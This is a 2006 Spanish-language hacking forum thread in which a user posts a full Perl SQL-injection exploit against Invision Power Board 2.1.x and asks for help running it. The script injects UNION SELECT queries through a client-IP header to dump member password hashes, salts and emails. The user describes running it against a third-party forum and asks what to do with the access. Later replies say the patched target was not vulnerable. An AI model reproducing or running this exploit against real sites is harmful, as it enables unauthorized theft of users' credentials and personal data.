Normas del foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Enero 08, 2009, 01:04:26
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u uNSeCure)  |  Tema: Aprovechar este exploit para php?? (IPB 2.1.6 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Aprovechar este exploit para php?? (IPB 2.1.6  (Leído 635 veces)
PkSM3
Recien Llegado
*
Desconectado Desconectado

Mensajes: 9



Ver Perfil
« en: Agosto 07, 2006, 09:41:42 »
Hola que tal... bueno, he leido mucho acerca de esto, pero las diversas opiniones, me tienen chato.. ej: unos dicen montar el php en el compu, y otros hacerme un FTTP, y ejecutarlo de ahi.... bueno el asunto que la pagina es I.P.B 2.1.6, y baje un exploit... creo que lo es, para IPB 2.1.6

Código:
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
&header();
if ( @ARGV < 2) {&info(); exit();}
$server = $ARGV[0];
$dir = $ARGV[1];
print "[+] SERVER {$server}\r\n";
print "[+] DIR {$dir}\r\n";
#Step 1, detecting vulnerability
print "[1] Testing forum vulnerability...";
$q = "UNION SELECT 'VULN',1,1,1/*";
query($q,$server,$dir);
if($rep =~/VULN/){ print "forum vulnerable\r\n"; }
else
    {
     print "forum unvulnerable\r\n";
    &footer();
     exit();
    }
#Step 2, detecting prefix
print "[2] Searching prefix...";
$q = "";
query($q,$server,$dir);
$prefix = $rep;
print $prefix."\r\n";
#Step 3, make query
print "[3] Performing query; it may take several minutes, plz, wait...\r\n";
$q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM ".$prefix."members_converge/*";
query($q1,$server,$dir);
$kol = $rep;
open(RES,">".$server."_result.txt");
for($id = 1; $id <= $kol; $id++)
    {
    $own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
     query($own_query,$server,$dir);
     if($rep=~/[0-9a-f]{32}/i)
       {
        $hash = $rep;
       $own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
         query($own_query,$server,$dir);
         if(length($rep)==5)
          {
          $salt = $rep;
          $own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*";
             query($own_query,$server,$dir);
          if(length($rep)>0)
             {
             $email = $rep;
             print RES $id.":".$hash.":".$salt."::".$email."\n";
             }
         }     
      }
    }
close(RES);
print "[!] Query was successfully perfomed. Results are in txt files\r\n";
&footer();
$ex = <STDIN>;
sub footer()
    {
     print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n";
     print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n";
    }
sub header()
{
print q(
----------------------------------------------------------
* Invision Power Board 2.1.* Remote SQL Injecton Exploit *
*       Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc)   *
*                Coded by w4g.not null                   *
*              FOR EDUCATIONAL PURPOSES *ONLY*           *
----------------------------------------------------------
);
}
sub info()
{
 print q(
[i] Usage: perl w4gipb216.pl [server] [/dir/]
     where
      |- server - server, where IPB installed without http://
      |- /dir/ - dir, where IPB installed or / for no dir
    e.g perl w4gipb216.pl someserver.com /forum/
[i] Stealing info about users (format id:pass:salt::email)   
[!] Need MySQL > 4.0
 );
}
sub query()
    {
     my($q,$server,$dir) =  @_;
     $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q);
     if($res->is_success)
        {
         $rep = '';
         if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
         else
             {
             if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; }
            }
        }
     return $rep;
    }

# milw0rm.com [2006-07-18]


Que hago con esto??... como lo ejecuto?... supongo que ya no necesito hacer scaneo de vulnerabilidades....no?... como compilo este exploit... lo ejecuto por cmd?...que necesito... ayuda please...
En línea
ManCuerTex
Visitante
« Respuesta #1 en: Agosto 08, 2006, 12:09:53 »
En línea
PkSM3
Recien Llegado
*
Desconectado Desconectado

Mensajes: 9



Ver Perfil
« Respuesta #2 en: Agosto 08, 2006, 04:49:20 »
No se por que, pero hace tiempo lo tenia instalado... y compilaba el exploit a mi manera... lo copiaba en un doc de texto, y le cambiaba la extension de .tx a .pl, y en el cmd hacia:
c:\appserv\php\exploit.pl

Pero me ejecutaba para abrirlo con alguna aplicacion del compu...o.O
Igual, usare el buscador, y de ahi edito y les narro lo que me paso...^^
Gracias...

EDIT: cambie de txt a pl, lo puse en c:\perl\exploit.pl
Lo ejecute asi por el cmd y me sale esto...


Lo que pude entender de lo que me decia el exploit de cmd, es que lo estoy ejecutando mal....
Entonces lo que entendi fue que tenia que hacer esto?...

c:\perl\exploit.pl [server] [/dir/]

el server seria
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.forosxxxxxxxxx.com
(asi es la ruta de los foros...)
Pero que tendria que poner en dir???

Toy mal?.... me pueden decir en que estoy fallando?...
Saludos






EDIT2: Wns!!!.... pude hacerlo... primera vez que llego tan lejos....
la formula era:
c:\perl\exploit.pl 00.00.00.00
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
www.forosxxxxxxxxx.com

Y me salio esto: (lo hice con otro exploit)



Ahora que tengo este poder, que hago??...
Me imagino, pero para no cagarlas me podrian orientar?...
« Última modificación: Agosto 08, 2006, 06:47:50 por pokesam3 » En línea
Guru
Visitante
« Respuesta #3 en: ſeptiembre 02, 2006, 10:01:04 »
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2188


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #4 en: ſeptiembre 02, 2006, 05:21:12 »
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
PkSM3
Recien Llegado
*
Desconectado Desconectado

Mensajes: 9



Ver Perfil
« Respuesta #5 en: ſeptiembre 03, 2006, 10:41:30 »
No pude hacerlo... me dice que el foro es "unvulnerable"... es posible?... no puedo hacer nada... y mas aun ahora que cambio a IPB 2.1.7...
No hay ningun exploit para el...
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2188


http://foro.undersecurity.net


Ver Perfil WWW
« Respuesta #6 en: ſeptiembre 03, 2006, 11:14:00 »
esta actualizado ... y no corre ese exploit

Cheesy
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
anonimox
Visitante
« Respuesta #7 en: ſeptiembre 07, 2006, 06:51:02 »
la verdad que yo he intentado en muchos foros y ninguno me funciono... Huh

al parecer que no funciona el exploit
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderadores: OzX, y0u uNSeCure)  |  Tema: Aprovechar este exploit para php?? (IPB 2.1.6 « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.7 | SMF © 2006-2007, Simple Machines LLC